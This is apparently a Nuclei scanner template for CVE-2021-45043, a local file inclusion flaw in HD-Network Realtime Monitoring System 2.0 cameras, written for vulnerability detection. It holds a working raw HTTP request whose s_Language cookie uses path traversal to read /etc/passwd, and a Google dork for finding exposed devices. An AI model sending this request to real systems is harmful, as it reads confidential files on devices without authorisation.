id: CVE-2021-45043 info: name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion author: Momen Eldawakhly,Evan Rubinstein severity: high description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-45043 - https://www.exploit-db.com/exploits/50588 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043 - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-45043 cwe-id: CWE-22 metadata: google-dork: intitle:"HD-Network Real-time Monitoring System V2.0" tags: cve,cve2021,hdnetwork,lfi,iot,camera requests: - raw: - | GET /language/lang HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/28